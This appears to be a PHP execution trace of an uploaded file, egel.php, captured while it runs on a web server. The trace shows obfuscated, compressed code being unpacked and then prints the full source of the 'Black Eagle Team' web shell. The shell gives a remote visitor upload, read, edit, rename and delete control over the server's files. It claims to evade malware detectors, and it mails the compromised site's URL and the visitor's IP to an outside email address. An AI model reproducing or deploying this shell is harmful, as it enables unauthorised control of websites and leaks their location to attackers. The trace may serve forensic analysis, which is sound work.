3 12 0 0.001442 403984 gzinflate 0 /var/www/html/uploads/egel.php(10) : eval()'d code 1 1 '\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\02'
3 12 1 0.001555 407088
3 12 R 'x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026'
3 13 0 0.001658 403984 gzuncompress 0 /var/www/html/uploads/egel.php(10) : eval()'d code 1 1 'x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026'
3 13 1 0.001753 407088
3 13 R 'x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026�\b��ޥdj�x'
3 14 0 0.001857 403984 gzuncompress 0 /var/www/html/uploads/egel.php(10) : eval()'d code 1 1 'x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026�\b��ޥdj�x'
3 14 1 0.002000 416304
3 14 R '<?php\r\n/*\r\n Black Eagle Team Shell v2\r\n By : Bo0G3yM4n\r\n Thanks To : Black Eagle Team, Dark Clown Security\r\n Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v\r\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\r\n*/\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n$sname = "Black Eagle Team" . " Minishell";\r\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\'
3 15 0 0.002391 471520 eval 1 '?><?php\r\n/*\r\n Black Eagle Team Shell v2\r\n By : Bo0G3yM4n\r\n Thanks To : Black Eagle Team, Dark Clown Security\r\n Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v\r\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\r\n*/\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n$sname = "Black Eagle Team" . " Minishell";\r\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\r\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\r\n$rm__dir = "\\x72\\x6d\\x64" . "ir";\r\n$un__link = "\\x75\\x6e" . "\\x6c\\x69\\x6e\\x6b";\r\nif (get_magic_quotes_gpc()) {\r\n foreach ($_POST as $key => $value) {\r\n $_POST[$key] = stripslashes($value);\r\n }\r\n}\r\necho \'<!DOCTYPE html>\r\n<html>\r\n<head>\r\n<meta name="robots" content"noindex. nofollow">\r\n<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">\r\n<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">\r\n<title>\'.$sname.\'</title>\r\n<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>\r\n<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body>\';\r\necho \'<div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>\' . $sname . \'</center></h1></div>\';\r\nif (isset($_GET[\'path\'])) {\r\n $path = $_GET[\'path\'];\r\n chdir($_GET[\'path\']);\r\n} else {\r\n $path = $__gcdir();\r\n}\r\n$path = str_replace("\\\\", "/", $path);\r\n$paths = explode("/", $path);\r\necho \'<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>\';\r\necho "<font style=\'font-size:13px;\'>Path: ";\r\nforeach ($paths as $id => $pat) {\r\n echo "<a style=\'font-size:13px;\' href=\'?path=";\r\n for ($i = 0; $i <= $id; $i++) {\r\n echo $paths[$i];\r\n if ($i != $id) {\r\n echo "/";\r\n }\r\n }\r\n echo "\'>$pat</a>/";\r\n}\r\necho \'<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/><input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';\r\nif (isset($_FILES[\'file\'])) {\r\n if (copy($_FILES[\'file\'][\'tmp_name\'], $path . \'/\' . $_FILES[\'file\'][\'name\'])) {\r\n echo \'<center><font color="#00ff00">Upload Berhasil!!</font></center><br/>\';\r\n } else {\r\n echo \'<center><font color="red">Upload Gagal!!</font></center><br/>\';\r\n }\r\n}\r\necho \'</td></tr><tr><td></table><div class="table-div"></div><input id="image" type="hidden">\';\r\necho \'\';\r\nif (isset($_GET[\'filesrc\'])) {\r\n echo \'<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';\r\n echo "" . basename($_GET[\'filesrc\']);\r\n ""; \r\n echo \'</tr></td></table><br />\';\r\n echo ("<center><textarea readonly=\'\'>" . htmlspecialchars($__fgetcon7s($_GET[\'filesrc\'])) . "</textarea></center>");\r\n} elseif (isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\') {\r\n echo \'</table><br /><center>\' . $_POST[\'path\'] . \'<br /><br />\';\r\n if ($_POST[\'opt\'] == \'rename\') {\r\n if (isset($_POST[\'newname\'])) {\r\n if (rename($_POST[\'path\'], $path . \'/\' . $_POST[\'newname\'])) {\r\n echo \'<center><font color="#00ff00">Rename OK!</font></center><br />\';\r\n } else {\r\n echo \'<center><font color="red">Rename Failed!</font></center><br />\';\r\n }\r\n $_POST[\'name\'] = $_POST[\'newname\'];\r\n }\r\n echo \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\' . $_POST[\'name\'] . \'" /> <input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Save" /></form>\';\r\n } elseif ($_POST[\'opt\'] == \'edit\') {\r\n if (isset($_POST[\'src\'])) {\r\n $fp = fopen($_POST[\'path\'], \'w\');\r\n if (fwrite($fp, $_POST[\'src\'])) {\r\n echo \'<center><font color="#00ff00">Edit File OK!.</font></center><br />\';\r\n } else {\r\n echo \'<center><font color="red">Edit File Failed!.</font></center><br />\';\r\n }\r\n fclose($fp);\r\n }\r\n echo \'<form method="POST"><textarea cols=80 rows=20 name="src">\' . htmlspecialchars($__fgetcon7s($_POST[\'path\'])) . \'</textarea><br /><input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Save" /></form>\';\r\n }\r\n echo \'</center>\';\r\n} else {\r\n echo \'</table><br /><center>\';\r\n if (isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\') {\r\n if ($_POST[\'type\'] == \'dir\') {\r\n if ($rm__dir($_POST[\'path\'])) {\r\n echo \'<center><font color="#00ff00">Dir Deleted!</font></center><br />\';\r\n } else {\r\n echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';\r\n }\r\n } elseif ($_POST[\'type\'] == \'file\') {\r\n if ($un__link($_POST[\'path\'])) {\r\n echo \'<font color="#00ff00">Delete File Done.</font><br />\';\r\n } else {\r\n echo \'<font color="red">Delete File Error.</font><br />\';\r\n }\r\n }\r\n }\r\n echo \'</center>\';\r\n $_scdir = $__scdir($path);\r\n echo \'<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"> <th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th> <th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>\';\r\n foreach ($_scdir as $dir) {\r\n if (!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\')\r\n continue;\r\n echo "<tr><td>[D] <a href=\\"?path=$path/$dir\\">$dir</a></td><td><center>--</center></td><td><center>";\r\n if (is_writable("$path/$dir"))\r\n echo \'<font color="#00ff00">\';\r\n elseif (!is_readable("$path/$dir"))\r\n echo \'<font color="red">\';\r\n echo perms("$path/$dir");\r\n if (is_writable("$path/$dir") || !is_readable("$path/$dir"))\r\n echo \'</font>\';\r\n echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . "";\r\n echo "</center></td> <td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\"> <input type=\\"submit\\" value=\\">>\\" /></form></center></td></tr>";\r\n }\r\n foreach ($_scdir as $file) {\r\n if (!is_file("$path/$file"))\r\n continue;\r\n $size = filesize("$path/$file") / 1024;\r\n $size = round($size, 3);\r\n if ($size >= 1024) {\r\n $size = round($size / 1024, 2) . \' MB\';\r\n } else {\r\n $size = $size . \' KB\';\r\n }\r\n echo "<tr><td>[F] <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td><td><center>" . $size . "</center></td><td><center>";\r\n if (is_writable("$path/$file"))\r\n echo \'<font color="#00ff00">\';\r\n elseif (!is_readable("$path/$file"))\r\n echo \'<font color="red">\';\r\n echo perms("$path/$file");\r\n if (is_writable("$path/$file") || !is_readable("$path/$file"))\r\n echo \'</font>\';\r\n echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . "";\r\n echo "</center></td><td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option><option value=\\"edit\\">Edit</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"file\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\"> <input type=\\"submit\\" value=\\">>\\" /></form></center></td></tr>";\r\n }\r\n echo \'</table></div>\';\r\n}\r\nfunction perms($file)\r\n{\r\n $perms = fileperms($file);\r\n if (($perms & 0xC000) == 0xC000) {\r\n $info = \'s\';\r\n } elseif (($perms & 0xA000) == 0xA000) {\r\n $info = \'l\';\r\n } elseif (($perms & 0x8000) == 0x8000) {\r\n $info = \'-\';\r\n } elseif (($perms & 0x6000) == 0x6000) {\r\n $info = \'b\';\r\n } elseif (($perms & 0x4000) == 0x4000) {\r\n $info = \'d\';\r\n } elseif (($perms & 0x2000) == 0x2000) {\r\n $info = \'c\';\r\n } elseif (($perms & 0x1000) == 0x1000) {\r\n $info = \'p\';\r\n } else {\r\n $info = \'u\';\r\n }\r\n $info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n $info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\') : (($perms & 0x0800) ? \'S\' : \'-\'));\r\n $info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n $info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\') : (($perms & 0x0400) ? \'S\' : \'-\'));\r\n $info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n $info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\') : (($perms & 0x0200) ? \'T\' : \'-\'));\r\n return $info;\r\n}\r\necho \'<br><center>© <span id="footer"></span> 2020 Black Eagle Team</center><br>\';\r\necho \'</body></html><!-- EOF -->\';\r\n?>\r\n<?php\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'64M\');\r\nheader(\'Content-Type: text/html; charset=UTF-8\');\r\n$to = \'alfredofernandezbutar@gmail.com\';\r\n$f31337 = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\n$fie = "Akses $f31337 :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";\r\nmail($to, "Papa Yui Chan Dapet Shell Nih : )", $fie, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");\r\n?>' /var/www/html/uploads/egel.php(10) : eval()'d code 1 0
4 16 0 0.002626 471520 set_time_limit 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 9 1 0
4 16 1 0.002654 471584
4 16 R FALSE
4 17 0 0.002669 471552 error_reporting 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 10 1 0
4 17 1 0.002685 471592
4 17 R 22527
4 18 0 0.002699 471552 error_log 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 11 1 0
4 18 1 0.002749 471584
4 18 R TRUE
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 12 $sname = 'Black Eagle Team Minishell'
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 13 $__gcdir = 'getcwd'
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 14 $__fgetcon7s = 'file_get_contents'
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 15 $__scdir = 'scandir'
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 16 $rm__dir = 'rmdir'
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 17 $un__link = 'unlink'
4 19 0 0.002837 471552 get_magic_quotes_gpc 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 18 0
4 19 1 0.002851 471552
4 19 R FALSE
4 20 0 0.002870 471552 getcwd 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 39 0
4 20 1 0.002888 471600
4 20 R '/var/www/html/uploads'
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 39 $path = '/var/www/html/uploads'
4 21 0 0.002916 471600 str_replace 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 41 3 '\\' '/' '/var/www/html/uploads'
4 21 1 0.002934 471696
4 21 R '/var/www/html/uploads'
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 41 $path = '/var/www/html/uploads'
4 22 0 0.002960 471600 explode 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 42 2 '/' '/var/www/html/uploads'
4 22 1 0.002978 472176
4 22 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 42 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 45 $id = 0
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i = 0
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 45 $id = 1
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i = 0
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 45 $id = 2
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i = 0
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 45 $id = 3
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i = 0
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 45 $id = 4
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i = 0
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 47 $i++
4 23 0 0.003248 472104 scandir 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 114 1 '/var/www/html/uploads'
4 23 1 0.003298 472728
4 23 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'egel.php', 5 => 'prepend.php']
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 114 $_scdir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'egel.php', 5 => 'prepend.php']
4 24 0 0.003346 472744 is_dir 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 117 1 '/var/www/html/uploads/.'
4 24 1 0.003365 472808
4 24 R TRUE
4 25 0 0.003381 472776 is_dir 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 117 1 '/var/www/html/uploads/..'
4 25 1 0.003398 472824
4 25 R TRUE
4 26 0 0.003412 472784 is_dir 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 117 1 '/var/www/html/uploads/.htaccess'
4 26 1 0.003428 472824
4 26 R FALSE
4 27 0 0.003442 472784 is_dir 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 117 1 '/var/www/html/uploads/data'
4 27 1 0.003458 472824
4 27 R TRUE
4 28 0 0.003472 472784 is_writable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 120 1 '/var/www/html/uploads/data'
4 28 1 0.003494 472824
4 28 R TRUE
4 29 0 0.003509 472784 perms 1 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 124 1 '/var/www/html/uploads/data'
5 30 0 0.003523 472784 fileperms 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 155 1 '/var/www/html/uploads/data'
5 30 1 0.003538 472824
5 30 R 16895
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 155 $perms = 16895
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 165 $info = 'd'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 173 $info .= 'r'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 174 $info .= 'w'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 175 $info .= 'x'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 176 $info .= 'r'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 177 $info .= 'w'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 178 $info .= 'x'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 179 $info .= 'r'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 180 $info .= 'w'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 181 $info .= 'x'
4 29 1 0.003672 472824
4 29 R 'drwxrwxrwx'
4 31 0 0.003687 472784 is_writable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 125 1 '/var/www/html/uploads/data'
4 31 1 0.003704 472824
4 31 R TRUE
4 32 0 0.003724 472784 filemtime 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 127 1 '/var/www/html/uploads/data'
4 32 1 0.003746 472824
4 32 R 1676260328
4 33 0 0.003764 472728 date 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 127 2 'd-M-Y H:i' 1676260328
4 33 1 0.003862 475120
4 33 R '12-Feb-2023 22:52'
4 34 0 0.003885 474848 is_dir 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 117 1 '/var/www/html/uploads/egel.php'
4 34 1 0.003904 474888
4 34 R FALSE
4 35 0 0.003918 474856 is_dir 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 117 1 '/var/www/html/uploads/prepend.php'
4 35 1 0.003935 474904
4 35 R FALSE
4 36 0 0.003949 474848 is_file 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 131 1 '/var/www/html/uploads/.'
4 36 1 0.003966 474872
4 36 R FALSE
4 37 0 0.003979 474840 is_file 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 131 1 '/var/www/html/uploads/..'
4 37 1 0.003995 474888
4 37 R FALSE
4 38 0 0.004008 474848 is_file 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 131 1 '/var/www/html/uploads/.htaccess'
4 38 1 0.004023 474888
4 38 R TRUE
4 39 0 0.004037 474848 filesize 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 133 1 '/var/www/html/uploads/.htaccess'
4 39 1 0.004051 474888
4 39 R 64
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 133 $size = 0.0625
4 40 0 0.004077 474792 round 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 134 2 0.0625 3
4 40 1 0.004092 474864
4 40 R 0.063
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 134 $size = 0.063
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 138 $size = '0.063 KB'
4 41 0 0.004131 474888 is_writable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 141 1 '/var/www/html/uploads/.htaccess'
4 41 1 0.004154 474928
4 41 R FALSE
4 42 0 0.004169 474888 is_readable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 143 1 '/var/www/html/uploads/.htaccess'
4 42 1 0.004185 474928
4 42 R TRUE
4 43 0 0.004199 474888 perms 1 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 145 1 '/var/www/html/uploads/.htaccess'
5 44 0 0.004213 474888 fileperms 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 155 1 '/var/www/html/uploads/.htaccess'
5 44 1 0.004226 474928
5 44 R 33188
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 155 $perms = 33188
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 161 $info = '-'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 173 $info .= 'r'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 174 $info .= 'w'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 175 $info .= '-'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 176 $info .= 'r'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 177 $info .= '-'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 178 $info .= '-'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 179 $info .= 'r'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 180 $info .= '-'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 181 $info .= '-'
4 43 1 0.004357 474928
4 43 R '-rw-r--r--'
4 45 0 0.004371 474888 is_writable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 146 1 '/var/www/html/uploads/.htaccess'
4 45 1 0.004387 474928
4 45 R FALSE
4 46 0 0.004401 474888 is_readable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 146 1 '/var/www/html/uploads/.htaccess'
4 46 1 0.004417 474928
4 46 R TRUE
4 47 0 0.004430 474888 filemtime 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 148 1 '/var/www/html/uploads/.htaccess'
4 47 1 0.004445 474928
4 47 R 1676260328
4 48 0 0.004458 474832 date 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 148 2 'd-M-Y H:i' 1676260328
4 48 1 0.004491 475160
4 48 R '12-Feb-2023 22:52'
4 49 0 0.004518 474888 is_file 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 131 1 '/var/www/html/uploads/data'
4 49 1 0.004535 474928
4 49 R FALSE
4 50 0 0.004549 474888 is_file 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 131 1 '/var/www/html/uploads/egel.php'
4 50 1 0.004564 474928
4 50 R TRUE
4 51 0 0.004577 474888 filesize 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 133 1 '/var/www/html/uploads/egel.php'
4 51 1 0.004591 474928
4 51 R 4440
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 133 $size = 4.3359375
4 52 0 0.004616 474792 round 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 134 2 4.3359375 3
4 52 1 0.004630 474864
4 52 R 4.336
